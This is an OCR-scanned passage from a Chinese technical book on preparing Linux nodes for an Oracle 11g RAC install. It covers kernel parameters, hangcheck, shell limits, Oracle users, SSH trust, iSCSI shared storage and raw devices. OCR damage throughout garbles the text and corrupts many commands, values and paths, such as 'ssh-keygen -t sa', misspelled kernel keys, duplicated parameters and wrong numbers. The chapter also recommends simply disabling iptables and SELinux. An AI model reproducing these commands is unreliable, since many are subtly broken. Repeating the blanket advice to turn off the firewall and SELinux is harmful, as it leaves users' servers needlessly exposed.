内 存 容 量 的 一 半 共享 内 存 段 的 最 大 尺寸 
TT 

除 此 之 外 ， 需 要 设置 的 参数 还 包括 /proc/sys/fs/file-max 和 /proc/sys/net/ipv4/ip_local_port range, 
如 表 4.5 所 示 。 


表 4.5 需要 设置 的 参数 描述 


Din 分 本 有 好 大 文件 句 本 


1024~6500 卫 端口 范围 , 默认 为 1024~4999, 只 允许 3975 


/proc/sys/net/ipv4/ip_local_port range 个 向 外 的 连接 ， 但 这 不 够 Oracle 的 使 用 


有 了 这 次 基础 参数 后 ， 需 要 修改 sysctl.conf 的 参数 ， 首 先 编辑 /etc/sysctl.conf 文件 ， 修 改 
后 的 参数 配置 如 下 所 示 : 
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Kernel sysctl configuration file for Red Hat Linuxll 


sysctl.conf(5) for more details. 
Controls IP packet forwarding 
net.ipv4.ip_forward = 1 
# Controls source route verification 
net.ipv4.conf.default.rp_filter = 1 
# Do not accept source routing 
net.ipv4.conf.default.accept_source_route = 0 
# Controls the System Request debugging functionality of the kernel 
kernel.sysrq = 0 
# Controls whether core dumps will append the PID to the core filename 
# Useful for debugging multi-threaded applications 
kernel ,core_uses_pid = 1 
# Controls the use of TCP syncookies 
net.ipv4.tcp_syncookies = 1 
# Controls the maximum size of a message, in bytes 
kernel .msgmnb = 65536 
# Controls the default maxmimum size of sa mesage queue 
kernel .msgmax = 65536 


net.core.rmem_default = 4194304 
net.core.wnem_max = 4194304 
net.core.wnem_default = 262144 
net.core.wnem_max = 262144 


# For binary values, 0 is disabled, 1 is enabled. See sysct1(8) and 


# Controls the maximum shared segment size, in bytes 
kernel. shmmax = 1073741823 

kernel. sem = 250 32000 100 128 

fs.file-nax = 65536 

net.ipv4.ip_local_port_range = 1024 65000 

# Controls the maximum number of shared memory segments, in pages 
kernel .shmall = 268435456 


下 面 简单 讲述 常用 的 几 个 内 核 参 数 的 含义 。 


@ kernel.shmmax: 表示 单个 共享 内 存 段 的 最 大 值 ， 以 字 节 为 单位 ， 此 值 一 般 为 物理 内 存 
的 一 半 ， 这 里 设 定 的 为 1GB。 

@ kernel.shmmni: 表示 单个 共享 内 存 段 的 最 小 值 ， 一 般 为 4KB， 即 4096B。 

@ kernel.shmall: 表示 可 用 共享 内 存 的 总 量 ， 单 位 是 页 ， 在 32 位 系统 上 一 页 等 于 4KB， 
也 就 是 4096B。 

@ fs.file-max: 表示 文件 句柄 的 最 大 数量 , 文件 句柄 表示 在 Linux 系统 中 可 以 打开 的 文件 
数量 。 


用 ulimit -a 可 以 查看 具体 数量 : 


# ulimit -a 


core file size (blocks, =c) 0 

data seg size (kbytes, -d) unlimited 
scheduling priority (-e) 0 

file size (blocks, -f) unlimited 
pending signals = 

max locked memory (kbytes, -1) 32 

max memory size (kbytes, -m) unlimited 
open files (-n) 1024 
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pipe size (512 bytes, -p) 8 

POSIX message queues (bytes, -q) 819200 
real-time priority (Er) 

stack size (kbytes, -s) 10240 

cpu time (seconds, -t) unlimited 
max user processes (Ca S2312 
Virtual memory (kbytes, -Vv) unlimited 
file locks (-X) unlimited 


@ netipv4.ip local port range: 表示 端口 的 范围 ， 为 指定 的 内 容 。 
@ kermel.sem: 用 来 设置 Linux 的 信号 量 。 


可 以 使 用 以 下 命令 查看 : 


[root@node-racl rac]#cat /proc/sys/kernel/sem 
250 32000 100 128 


结果 显示 4 段 参 数 为 : 230、32000、100、128。 对 于 输出 的 这 4 个 值 的 含义 ， 见 表 4.3 的 


ko 


要 确定 所 有 共享 内 存 的 限制 可 以 使 用 以 下 命令 : 


# ipcs -lm 

二 Shared Memory Limits ----—--—-—— 

max number of segments = 4096 

max seg size (kbytes) = 4194303 

max total shared memory (kbytes) = 1073741824 


min seg size (bytes) = 1 


下 面 再 以 root 用 户 身份 ， 在 两 节点 上 做 如 下 配置 。 


(1) hangcheck-timer.ko 模块 
hangcheck-timer.ko 模块 使 用 了 基于 内 核 的 计算 器 ， 用 来 检查 系统 调度 程序 ， 从 而 确定 系统 


的 运行 状态 。 从 Oracle 官方 资料 来 看 ， 强 烈 建议 安装 时 使 用 它 。 


下 面 接着 查看 该 模块 是 否 存 在 : 


[root@node-racl ~]#find /lib/modules -name "hangcheck-timer.ko" 
/lib/modules/2.6.Array-11.0.0.10.3.EL/kernel/drivers/char/hangcheck-timer. 


编辑 /etc/modprobe.conf: 
[root@node-racl ~]# vi /etc/modprobe.conf 
在 文件 的 末尾 加 入 一 行 : 


options hangcheck-timer hangcheck tick=30 hangcheck margin=180 
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然后 ， 将 hangcheck-timer 模块 配置 为 自 启动 : 
[root@node-racl ~]#vi /etc/rc.d/rc.local 

在 文件 的 末尾 加 入 一 行 : 

/sbin/modprobe hangcheck timer 

接着 ， 加 载 hangcheck: 

[rootenode-racl ~]# /sbin/modprobe hangcheck timer 
最 后 ， 检 查 hangcheck 是 否 成 功 启动 : 


[root@node-racl ~]#grep hangcheck /var/log/messages | tail -2 
Aug 29 19:08:07 Mysqll kernel: Hangcheck: starting hangcheck timer 0.9.0 (tick 


is 30 seconds, margin is 180 seconds). 
如 果 显 示 上 面 的 输出 信息 ， 说 明 已 经 成 功 启动 hangcheck。 


(2) Linux 内 存 调整 
在 设置 完 内 核 调整 之 后 ， 为 今后 运行 顺畅 ， 还 是 有 必要 做 一 下 内 存 调整 ， 需 设置 的 Linux 
参数 如 下 : 


/proc/sys/kernel/shmall 2097152 
/proc/sys/kernel/shmmni 4096 
/proc/sys/kernel/shmmax 2147483648 


注意 : shmmax 参数 通常 设置 为 2147483638， 即 2GB， 若 需要 创建 大 于 2GB 的 SGA， 则 
必须 增 大 shmmax 的 参数 值 。 这 个 参数 表示 单个 共享 内 存 段 的 最 大 值 。 


4.2.4 给 Oracle 用 户 配置 Shell 


要 完成 Oracle 的 安装 ,除了 上 述 工作 以 外 ,还 需要 完成 一 些 必要 的 工作 ,主要 是 提高 Oracle 
用 户 的 Shell 限制 , 以便 可 以 创建 和 打开 大 文件 .完成 这 些 工作 需要 修改 limits.conf 和 /etc/profile 
文件 ， 以 提高 其 中 设置 的 上 限 。 

以 root 用 户 身 份 ， 在 每 个 节点 上 执行 相同 的 操作 。 

首先 ， 修 改 /etc/security/limits.conf， 在 文件 最 后 添加 如 下 内 容 : 


oracle soft nproc 2047 
oracle hard nproc 16384 
oracle soft nofile 1024 


oracle hard nofile 65536 


接着 ， 修 改 /etc/pam.d/login， 在 文件 最 后 添加 如 下 内 容 : 
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session required /lib/security/pam limits.so 
最 后 ， 修 改 /etc/profile， 在 文件 最 后 添加 如 下 内 容 : 


if [ $USER = "oracle" ]; then 
if [ $SHELL = "/bin/ksh" ]; then 
ulimit -p 16384 
ulimit -n 65536 
else 
ulimit -u 16384 -n 65536 
正二 
人 
所 有 修改 完毕 ,重启 两 台 Linux 节点 服务 器 。 这 些 任 务 全 部 完成 以 后 ,准备 工作 就 基本 结 
束 了 ， 剩 下 的 任务 就 是 保存 Oracle 二 进 制 文件 和 数据 文件 的 目录 ， 并 设置 好 Oracle 的 环境 ， 
然后 就 可 以 着 手 安 装 Oracle llg 了 。 


4.2.5 配置 系统 安全 设置 


在 安装 RAC 数据 库 时 ， 安 装 进 程 需要 在 每 个 节点 间 传 送 数据 ， 这 就 要 求 每 个 节点 间 是 互 
信任 的 , 因此 ,最 简单 的 方式 就 是 关闭 系统 的 安全 限制 ,常用 的 方式 是 关闭 Linux 系统 的 iptables 
以 及 selinux， 在 每 个 节点 上 执行 相同 的 操作 。 

关闭 iptables 很 简单 ， 可 以 直接 执行 如 下 命令 : 

[root@node-racl ~]# service iptables stop 


最 后 ， 将 selinux 禁用 即 可 ， 也 就 是 修改 /etc/selinux/config 文件 ， 修 改 后 的 内 容 为 : 


SELINUX=disabled 
SELINUXTYPE=targeted 


4.2.6 添加 Oracle 用 户 和 组 


在 安装 进行 之 前 ， 需 要 创建 两 个 用 户 组 (dba，oinstall) 和 一 个 用 户 (oracle〉， 分 别 用 于 
Oracle 安装 和 Oracle 管理 ， 在 两 个 节点 执行 相同 的 操作 ， 操 作 如 下 : 


[root@node-racl ~]#groupadd -g 1001 dba 
[root@node-racl ~]#groupadd -g 1002 oinstall 
[root@node-racl ~]#useradd -u 1001 -g oinstall -G dba oracle 


从 用 途上 来 说 ，oinstall 组 用 于 安装 数据 库 ，dba 组 用 于 管理 数据 库 ， 参 数 “-g” 表 明 指定 
主要 组 ，“-G” 表 明 指 定 副 组 〈 备 用 组 ) 。 


注意 : 如 果 在 SUSE 系统 下 ， 命 令 有 些小 变化 : 
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#useradd -m -g oinstall -G dba oracle 
然后 ， 给 oracle 用 户 设置 密码 : 
[root@node-racl ~]# passwd oracle 


最 后 , 确认 匿名 用 户 nobody 是 否 存在 于 系统 中 , 因为 在 安装 完成 后 nobody 用 户 需 要 执行 
一 些 扩展 任务 : 


[root@node-racl ~]# id nobody 
uid=99 (nobody) gid=99 (nobody) groups=99 (nobody) 


这 样 ， 用 户 和 组 创建 就 完毕 了 。 


4.2.7 ”设置 Oracle 用 户 环 境 变量 


用 文本 编辑 器 vi 编辑 /home/oracle/.bash_profile 文件 ， 在 文件 最 后 添加 如 下 内 容 ， 这 里 以 
node-racl 为 例 , 同 理 , 需要 在 节点 node-rac2 上 也 执行 相同 的 操作 。 注意 , 包括 上 面 几 个 步骤 ， 
都 需要 在 两 个 节点 上 分 别 设 定 才 行 。 


export ORACLE _BRSE=/u01/oracle 
export ORACLE HOME=$SORRCLE BASE/product/11.0.6/rac db \\ 主 程序 位 置 
export ORA CRS HOME=/app/crs/product/11.0.6/crs \\ 集 群 软件 位 置 
export 

ORACLE PATH=$ORACLE BASE/common/oracle/sql:.:$ORACLE HOME/rdbms/admin 
export ORACLE SID=racdbl \\ 如 果 在 node-rac2 上 面 操 作 ， 则 需要 改 为 racdb2 
export NLS_ LANG=AMERICAN AMERICA.zhsl6gbk 
export NLS_ DATE FORMAT="YYYY-MM-DD HH24:MI:SS" 
export PATH=.:${PATH}:$HOME/bin:$ORACLE HOME/bin:$O0RA CRS HOME/bin 
export PATH=${PATH}:/usr/bin:/bin:/usr/bin/xX11:/usr/local/bin 
export PATH=${PATH} :$0ORACLE BASE/common/oracle/bin 
export ORACLE TERM=xterm 
export TNS ADMIN=$ORACLE HOME/network/admin 
export ORA NLS10=$0RACLE HOME/nls/data 
export LD LIBRARY PATH=$ORACLE HOME/1ib 
export LD LIBRARY PATH=${LD LIBRARY PATH}:$ORACLE HOME/oracm/l1ib 
export LD LIBRARY PATH=${LD LIBRARY PATH}:/lib:/usr/lib:/usr/local/lib 
export CLASSPATH=$ORACLE HOME/JRE 
export CLASSPATH=${CLASSPATH}:$ORACLE HOME/jlib 
export CLASSPATH=$ {CLASSPATH}:$ORACLE HOME/rdbms/jlib 
export CLASSPATH=$ {CLASSPATH}:$ORACLE HOME/network/jlib 
export THREADS FLAG=native 
export TEMP=/tmp 
export TMPDIR=/tmp 
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根据 Oracle 官方 的 建议 , 这 里 将 Oracle RAC 数据 库 程 序 和 Oracle Clusterware 软件 安装 在 
不 同 的 目录 。 而 “ORACLE SID” 在 节点 2 上 应 该 设置 为 “export ORACLE SID=racdb2”。 

设置 完毕 Oracle 用 户 环境 变量 后 ， 还 需要 在 两 个 节点 的 创建 环境 变量 中 指定 安装 目录 ， 
基本 操作 如 下 : 


[root@node-racl ~]# mkdir -p /u01/oracle/product/11.0.6/rac_ db 
[root@node-racl ~]# mkdir -p /app/oracrs/product/11.0.6/crs 
[root@node-racl ~]# chown -R oracle:oinstall /u0l/oracle 


[root@node-racl ~]#chown -R oracle:oinstall /app 


4.2.8 配置 节点 间 的 SSH 信任 


在 安装 RAC 过 程 中 ，OUI 程序 会 使 用 ssh 和 scp 命令 来 执行 远程 复制 操作 ， 将 文件 从 安 
装 节 点 复制 到 其 他 节点 上 ， 如果 节点 间 不 相互 信任 ,那么 传输 过 程 就 需要 输入 密码 ， 从 而 导致 
安装 失败 ， 因 此 必须 在 所 有 的 节点 上 为 Oracle 用 户 配 置 节 点 间 的 信任 。 


1. 在 每 个 节点 上 创建 RSA 密 钥 和 公 番 


加 以 Oracle 用 户 登 录 。 
贺 在 Oracle 用 户 的 根 目 录 内 (/home/oracle ) 创建 .ssh 目录 并 设置 读 取 权 限 : 


[oracleenode-racl ~]$ mkdir ~/.ssh 
[oracleenode-racl ~]$ chmod 700 ~/.ssh 


贺 使 用 ssh-keygen 命令 生成 基于 SSH 协议 的 RSA 密 钥 : 


[oracle@node-racl ~]$ cd ~/.ssh 

[oracle@node-racl .ssh]$ ssh-keygen -t sa 

Generating public/private rsa key pair. 

Enter file in which to save the key (/home/oracle/.ssh/id rsa): 
Enter passphrase (empty for no passphrase): 

Enter same passphrase again: 

Your identification has been saved in /home/oracle/.ssh/id rsa. 
Your public key has been saved in /home/oracle/.ssh/id rsa.pub. 
The key fingerprint is: 
dd:69:5a:aa:e6:85:88:a4:07:72:ab:15:7b:3b:4a:77 oracle@node-racl 


贺 这 时 创建 了 两 个 文件 id_rsa 和 id_rsa.pub。 在 提示 保存 私 钥 (key ) 和 公 钥 (public key ) 
的 位 置 时 ， 选 择 使 用 默认 值 ， 然 后 依次 直接 按 回 车 键 即 可 。 接 下 来 把 相关 公 钥 传 到 服务 器 上 。 


2. 整合 公 铀 文件 
以 Oracle 用 户 登 录 。 在 要 执行 Oracle 安装 程序 的 节点 node-racl 上 执行 如 下 操作 : 


[oracleenode-racl ~] $ cd ~/.ssh 
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[oracle@node-racl .ssh]$ ssh node-racl cat /home/oracle/.ssh/id rsa.pub >> 


authorized keys 
这 条 命令 的 含义 是 将 当前 节点 下 的 id_rsapub 文件 内 容 写 到 authorized keys 中 去 。 


[oracleenode-racl .ssh]$ ssh node-rac2 cat /home/oracle/.ssh/id rsa.pub >> 
authorized keys 


通过 这 两 个 命令 把 相关 密 钥 文件 整合 到 authorized keys 中 。 
[oracle@node-racl .ssh]$ chmod 600 ~/.ssh/authorized keys 


因为 这 个 文件 是 公 钥 ， 所 以 文件 权限 设置 得 非常 低 ， 为 600。 


[oracle@node-racl .ssh]$scp authorized keys node-rac2:/home/oracle/.ssh/ 


这 个 操作 过 程 是 将 两 个 节点 生成 的 公 钥 文件 整合 为 一 个 authorized_keys 文件 ， 然 后 进行 
授权 ， 并 将 authorized_keys 复制 到 另 一 个 节点 。 


3. 测试 SSH 互信 
首先 在 node-racl 节点 上 执行 如 下 代码 : 
[oracle@node-racl ~]$ ssh node-racl date 


第 一 次 执行 这 个 命令 时 完成 了 两 个 操作 , 执行 中 会 要 求 输入 密码 , 再 次 执行 时 就 不 需要 密 
码 了 。 


[oracle@node-racl ~]$ ssh node-rac2 date 


然后 在 node-rac2 节点 上 执行 : 


[oracle@node-rac2 ~]$ ssh node-racl date 


[oracle@node-rac2 ~]$ ssh node-rac2 date 


如 果 不 需要 输入 密码 就 会 出 现 系 统 当前 日 期 ， 这 说 明 SSH 互信 已 经 配置 成 功 了 。 


4.2.9 配置 共享 存储 系统 


1.iSCSI 架构 优势 

iSCSI 是 一 种 在 Internet 协议 上 , 特别 是 以 太 网 上 进行 数据 块 传输 的 标准 , 它 是 一 种 基于 人 P 
Storage 理论 的 新 型 存储 技术 ， 该 技术 是 将 存储 行业 广泛 应 用 的 SCSI 接口 技术 与 人 P 网 络 技术 
相 结合 , 可 以 在 IP 网 络 上 构建 SAN 存储 区 域 网 , 简单 地 说 , iSCSI 就 是 在 人 P 网 络 上 运行 SCSI 
协议 的 一 种 网 络 存储 技术 。iSCSI 技术 有 如 下 三 个 革命 性 的 变化 : 
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@ 把 原来 只 用 于 本 机 的 SCSI 通 过 TCP/IP 网 络 传送 ， 使 连接 距离 可 作 无 限 的 地 域 延 伸 ; 
@ 连接 的 服务 器 数量 无 限 ; 

@ 由 于 是 服务 器 架构 ， 因 此 也 可 以 实现 在 线 扩容 以 至 动态 部 署 。 

图 4.4 为 PC 架构 中 iSCSI 基本 存储 系统 图 。 


isCSI Target 服务 器 


iSCSI Target 


isCSlinitiator 


图 4.4 PC 架构 iSCSI 基本 存储 系统 图 

本 案例 中 我 们 采用 以 太 网 卡 +Initiator 软件 的 方式 ， 服 务 器 、 工 作 站 等 主机 使 用 标准 的 以 
太 网 卡 ， 通 过 以 太 网 线 直接 与 以 太 网 交换 机 连接 ，iSCSI 存储 也 通过 以 太 网 线 连 接 到 以 太 网 交 
换 机 上 ， 在 主机 上 安装 Initiator 软件 。 之 所 以 采用 这 个 方案 ， 主 要 是 考虑 到 它 在 现 有 网 络 基础 
上 即 可 完成 , 成 本 很 低 、 配 置 简单 、 管 理 非 常 方便 。 如 果 考 虑 更 好 性 能 的 话 , 可 以 用 iSCSIHBA 
方式 。 软 件 方面 我 们 使 用 Linux 平台 下 开源 的 iSCSI Target 软件 、iSCSI Enterprise Target。 表 
4.6 给 出 了 不 同 操 作 系 统 下 的 人 P 地 址 规划 。 


表 4.6 IP 地 址 规划 表 


EE Er 


Initiator 主机 2 192.168.12.232 iSCSI-Initiator-utils 


2. 服务 器 端 配置 共享 


在 这 个 环境 中 , 共享 存储 由 一 台 iSCSI-target 主机 来 提供 ,通过 以 太 网 ,假定 将 iSCSI-Target 
主机 的 两 块 本 地 磁盘 /devwsdb、/dev/sdc 共享 给 RAC 数据 库 的 两 个 节点 ， 由 于 iSCSI 的 安装 已 
经 在 前 面 章节 进行 了 详细 讲述 ， 这 里 不 再 介绍 ， 然 后 对 两 块 共享 磁盘 分 别 划 分 为 多 个 分 区 , 每 
个 分 区 的 用 途 如 表 4.7 所 示 。 
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表 4.7 磁盘 分 区 用 途 
磁盘 分 区 标识 用 途 
/dev/sdb5 OCR 磁盘 ， 用 于 存储 集权 配置 信息 ，Oracle 要 求 不 小 于 256MB 
/dev/sdb6 OCR 镜像 磁盘 


/dev/sdb7 Voting disk, 用 户 记录 集群 节 ; Oracle 要 求 磁盘 不 小 于 256MB 
/dev/sdb8 Voting disk 的 镜像 磁盘 
/dev/sdb9 Voting disk 的 镜像 磁盘 
/dev/sdc5 Oracle 闪 回 数据 存放 分 区 
/dev/sdc6 Oracle 归档 日 志 分 区 
/dev/sdc7 Oracle 归档 日 志 镜 像 磁盘 分 区 
/dev/sdc8 10GB RAC 数据 库 数据 存放 分 区 
/dev/sdc9 10GB RAC 数据 库存 放 镜 像 磁盘 分 区 
按照 如 下 地 址 下 载 软件 。 


http://sourceforge.net/projects/iscsitarget/files/iscsitarget/1.4.20.2/isc 
sitarget-1.4.20.2.tar.gz/download 


下 载 完 毕 后 解压 并 安装 。 默认 安 装 完成 后 没有 任何 策略 , 无 法 使 用 , 我 们 需要 对 其 进行 配 
置 。 主 配置 文件 位 于 /etc/ieietd.conf, 所 有 配置 行 都 是 注释 的 。. 设 定 LUN(Logical Unit Number)， 
找到 类 似 如 下 行 : 

#Target iqn.2001-04.com.example:storage.disk2.sysl.xyz 

去 掉 “#” 号 ， 并 把 识别 代码 storage.disk2.sysl.xyz 去 掉 ， 我 们 假定 /dev/sde 可 以 共享 ， 修 
改 后 的 代码 如 下 : 


Target iqn.2011-08.net.ixdba:sdc 
# Lun 0 Path=/dev/sdb,Type=fileio,Scsild=xyz,ScsiSN=xyz 


Path 后 面 的 值 很 重要 ， 用 于 指明 共享 的 磁盘 ， 要 保证 /dev/sdc 在 本 地 存在 ， 去 掉 “#” 号 ， 
修改 后 的 代码 如 下 : 

Lun 0 Path=/dev/sdc,Type=fileio,Scsild=xyz,ScsiSN=xyz 

注意 两 点 : 一 是 不 要 把 识别 代码 写成 /dev/sde 带 斜 杠 的 形式 ; 二 是 如 果 共 享 两 块 硬盘 该 如 
何 操作 ? 上 面 标记 1 和 标记 2 这 两 行 是 成 对 出 现 的 。 如 果 共享 第 2 块 磁盘 (比如 /dev/sdd》， 
那么 ， 如 下 所 示 可 同时 共享 两 块 磁盘 ， 以 此 类 推 ; 

Target iqn.2011-08.net.ixdba:sdc 

Lun 0 Path=/dev/sdc,Type=fileio,Scsild=xyz,ScsiSN=xyz 


Target iqn.2011-08.net.ixdba:sdd 
Lun 0 Path=/dev/sdd,Type=fileio,Scsild=xyz, ScsiSN=xyz 


启动 iSCSI-Target 服务 ， 有 两 个 方法 。 
方法 一 : 


#service iscsi-target start 
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方法 三 
#/etc/init.d/iscsi-target start 


同时 我 们 可 以 查看 日 志 : 


#tail -f /var/log/messages 


Aug28 08: 04: 10 localhost kernel:iSCSI Enterprise Target Software - Version 


Aug28 08: 04: 10 localhost kernel:iscsi trgt:Registered io type fileio 
Aug28 08: 04: 10 localhost kernel:iscsi trge:Registered io type blockid 
Aug28 08: 04: 10 localhost kernel:iscsi trgt:Registered io type nullio 


若 没 有 错误 提示 ， 则 表示 成 功 启动 。 


3. 在 Linux 节点 机 安装 软件 iSCSI Initiator 


# rpm -ivh ./Server/iscsi-initiator-utils-6.2.0.868-0.7.e15.i386.rpm 

warning: ./Server/iscsi-initiator-utils-6.2.0.868-0.7.e1l5.i386.rpm: Header 
V3 DSA signature: NOKEY, key ID 37017186 

Preparing... 挤 提 提 提 提亲 提 提 提 提 拉 搓 捍 提 提 反 提亲 并 反 提 提 提 间 提亲 失 提 并 提 拉 并 提 并 并 并 并 并 并 并 并 闪 并 [1 OO 名] 

1:iscsi-initiator-utils 提 提 六 提 提 提 提 打 提 提 提 拉 提 提 提 提 提 提 提 提 提 提 扩 拉 提 提 提 提 提 提 提 拉 提 提 并 并 提 提 失 井 井 并 并 [1 OOSS] 

# /etc/init.d/iscsi start 

# ps -ef lgrep iscsi 


root 6565 1 0 20:40 ? 00:00:00 brcm iscsiuio 
root 6565 1 0 20:40 ? 00:00:00 iscsid 

root 6566 1 0 20:40 ? 00:00:00 iscsid 

root 6573 6400 0 20:40 pts/1 00:00:00 grep iscsi 
root 6526 6 0 20:40 ? 00:00:00 [iscsi eh] 


4. 执行 iSCSI Target 发 现 


#iscsiadmin -m discovery -t sendtargets -p 192.168.12.246 
192.168.168.12.246:3260,1 iqn.201l,net.ixdba:sdc 

#fdisk -1 1grep sdc 

Disk /dev/sdc: 50.4GB 53687091200 bytes 


需要 说 明 的 是 : 当成 功 执行 一 次 Target 发 现 后 ，iSCSI Initiator 就 会 将 查询 记录 写 到 
/var/lib/iscsi/send_targets 对 应 的 目录 下 。 因 此 ， 对 于 Target 发 现 只 需 执行 一 次 即 可 。 
执行 Target 操作 ， 客 户 端 记录 了 两 个 内 容 分 别 为 Discovery 和 Node。 


® Discovery (/var/lib/iscsi/send targets ): 在 /var/lib/iscsi/send targets 目录 下 ， 生 成 一 个 

Target 服务 器 信息 文件 ， 文 件 名 为 “Target 服务 的 IP, 端 口号 ”( 例如 
“192.168.12.246,3260”)。 此 文件 用 来 记录 Target 服务 器 信息 。 

@ Node (/var/lib/iscsilnodes ): 在 /var/lib/iscsi/nodes 目录 下 ， 生 成 一 个 或 多 个 以 Target 存 

储 服务 器 上 的 Target 名 命名 的 文件 夹 ， 每 个 文件 夹 下 都 有 一 个 用 来 记录 Target 服务 器 
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上 特定 Target 信息 的 文件 。 
5. 通过 iscsiadm 指令 与 iSCSI Target 建立 关联 


iscsiadm 是 用 来 管理 〈 更 新 、 删 除 、 插 入 、 查 询 ) iSCSI 配置 数据 库 文件 的 命令 行 工 具 ， 
用 户 能 够 用 它 对 iSCSI nodes、sessions、connections 和 discovery records 进行 一 系列 的 操作 。 
登录 iSCSI Target: 


iscsiadm -m node -T <target-name> -p <ip-address>:<port> --login 
或 : 
iscsiadm -m node -T [target-name] -p [ip-address] -1 


这 里 的 “-T” 后 面 跟 target 名 称 , “ip-address” 是 Target 主机 的 人 P 地 址 ，“port” 是 Target 
主机 的 端口 号 ， 默认 是 3260。 
断 开 Initiator 与 iSCSI Target 主机 的 连接 : 


#iscsiadm -m node -T [target-name] -p [ip-address] -u 


查看 iSCSI session 和 设备 信息 : 


#iscsiadm -m session -i 
#iscsiadm -m session -R 


如 果 一 个 Target 下 新 增 了 一 个 卷 ， 在 服务 器 上 使 用 iscsiadm -m session -R 命令 可 以 刷新 
当前 连接 的 session 以 看 到 新 增 的 卷 。 
查看 有 哪些 Target 记录 在 了 数据 库 中 : 


#iscsiadm -m node 
查看 Target 存储 端的 相关 配置 信息 : 


iscsiadm -m node -T iqn.2010-1l1.net.ixdba:sdc -p 192.168.12.246 
iscsiadm -m discovery -p 192.168.12.246 


6. 管理 共享 磁盘 


(1) 分 区 、 格 式 化 共享 磁盘 
通过 fdisk 命令 查看 共享 过 来 的 磁盘 标识 ， 也 可 以 通过 dmesg 命令 查看 系统 是 否 识别 了 共 
享 的 iSCSI 磁盘 : 


[root@ Initiator iscsi ]#fdisk -1 


当 iSCSI 客户 端 识别 了 共享 磁盘 后 ， 就 可 以 对 这 个 磁盘 进行 重新 分 区 、 格 式 化 、 创 建文 件 
系统 等 操作 了 。 
分 区 完毕 进行 格式 化 之 后 可 进行 挂 载 操作 : 


#mkfs.ext3 /dev/sdc5 
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tune2fs 用 于 修改 文件 系统 的 属性 ， 去 掉 自 动 检查 的 属性 ， 因 为 对 于 容量 为 几 百 GB 或 上 
TB 的 系统 ， 检 查 时 间 会 非常 漫长 ， 所 以 用 以 下 命令 ， 去 掉 检查 属性 : 


[root@data iscsi]# tune2fs -c -1 -i 0 /dev/sdc5 
tune2fs 1.39 (29-May-2006) 

Setting maximal mount count to -1 # 参 数 -1 表示 无 限 大 
Setting interval between checks to 0 seconds 


Linux 上 的 ext 文件 系统 有 一 个 特性 ， 对 某 个 分 区 mount、umount 很 多 次 后 或 者 隔 一 个 固 
定 的 时 间 后 ， 系 统 会 对 该 分 区 进行 检测 ， 这 就 会 导致 硬盘 反应 速度 很 慢 ， 影 响 业 务 ， 本 操作 的 
目的 就 是 去 掉 文件 系统 的 自动 检查 属性 。 


(2) 设 定 文件 系统 的 自动 挂 载 
用 tune2fs 查看 文件 系统 的 UUID: 


[root@data iscsi]# tune2fs -1 /dev/sdc5 1grep UUID 
Filesystem UUID: b5d94f7f-295f-4130-b594-4247ddc7e074 
[root@data iscsi]# mkdir /data 


编辑 /etc/fstab 文件 ， 设 置 自动 挂 载 : 


UUID= b5d94f7f-295f-4130-b594-4247ddc7e074 /data ext3 netdev 00 


磁盘 设备 的 名 称 可 能 会 发 生变 化 , 从 而 引起 文件 系统 不 能 挂 载 上 来 或 者 不 能 正确 挂 载 , 使 
用 UUID 的 方式 进行 挂 载 可 以 解决 这 个 问题 ， 也 可 以 使 用 给 文件 系统 设置 卷 标的 方式 来 解决 。 
_netdev 是 针对 iSCSI 设备 的 特殊 mount 选项 ， 此 挂 载 选项 指示 将 在 网 络 启动 后 挂 载 该 卷 ， 在 
关闭 网 络 前 卸载 该 卷 。 

7.iSCSI 在 安全 方面 的 相关 设 定 

为 防止 其 他 机 器 共享 iSCSI 共享 磁盘 ， 我 们 需要 修改 /etc/iet/initiators.allow 文件 : 

iqn.2011-08.net.ixdba:sdc 192.168.12.235 // 这 个 IP 就 是 授权 IP, 是 客户 端 主机 地 址 


4.2.10 ”建立 和 配置 raw 设备 


从 性 能 方面 的 考虑 ，raw 设备 在 Oracle 上 应 用 得 非常 官方 ， 在 raw 设备 上 Oracle 没有 使 
用 文件 系统 , 正 因为 它 绕 过 了 文件 系统 处 理 , 所 以 可 以 减少 对 CPU 的 使 用 , 而 是 完全 由 Oracle 
RDBMS 来 管理 ， 关 于 raw 设备 (原始 设备 ) 的 使 用 ，raw 必须 通过 uderv 来 管理 raw， 并 且 
raw 命令 的 位 置 从 /usr/bin/raw 变 为 /bin/raw， 这 从 安全 方面 改进 了 不 少 ， 但 是 仍然 兼容 之 前 的 
配置 方式 ， 因 此 在 CentOS 5 版 本 中 配置 raw 的 方法 有 两 种 : 


(1) 手动 建立 /etc/sysconfig/rawdevices 文件 ， 然 后 从 其 他 操作 系统 中 复制 /etwinitdrawdevices 
文件 到 本 机 ， 修 改 /etc/init.d/rawdevices 文件 中 raw 命令 的 路 径 ， 然 后 就 可 以 通过 
/etc/init.d/rawdevices 来 启动 和 关闭 raw 文件 了 。 
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(2) 通过 udev 来 管理 raw， 添 加 raw 设备 对 应 的 配置 文件 如 下 : 


/etc/udev/rules.d/60-raw.rules。 


这 里 采用 第 二 种 方式 来 建立 和 配置 raw 设备 ,首先 修改 /etc/udev/rules.d/60-raw.rules 文件 ， 
修改 完成 的 内 容 如 下 : 


"sdb5",RUN+="/bin/raw /dev/raw/rawl SN" 
sdb6",RUN+="/bin/raw /dev/raw/raw2 %N" 


"sdc8",RUN+="/bin/raw /dev/raw/raw9 %N" 
sdc9",RUN+="/bin/raw /dev/raw/rawl0 %N" 
KERNEL=="rawl", OWNER="oracle", GROUP="oinstall", MODE="644" 
7 OWNER="oracle", GROUP="oinstall", MODE="644" 
KERNEL=="raw3", OWNER="oracle", GROUP="oinstall", MODE="660" 


KERNEL=="raw9", OWNER="oracle", GROUP="oinstall", MODE="660" 
KERNEL=="rawl0", OWNER="oracle", GROUP="oinstall", MODE="660" 


从 上 面 可 以 看 出 ， 有 10 个 原始 裸 设备 。 
接 下 来 ， 启 动 udev 服务 生成 raw 设备 : 


[rootenode-racl /]# start udev 
Starting udev: [ OK ] 


接着 验证 一 下 raw 设备 是 否 生成 : 


[root@node-racl /]# 11 /dev/raw/raw* 
Crw-r--r-- 1 oracle oinstall 162, 1 Aug 27 00:13 /dev/raw/rawl 


Crw-rw---- 1 oracle oinstall 162, 10 Aug 27 00:13 /dev/raw/rawl0 
Crw-r--r-- 1 oracle oinstall 162, 2 Aug 27 00:13 /dev/raw/raw2 
Crw-rw---- 1 oracle oinstall 162, 6 Aug 27 00:13 /dev/raw/raw6 
Crw-rw---- 1 oracle oinstall 162, 7 Aug 27 00:13 /dev/raw/raw7 


Crw-rw---—- 1 oracle oinstall 162, 8 Aug 27 00:13 /dev/raw/raw8 
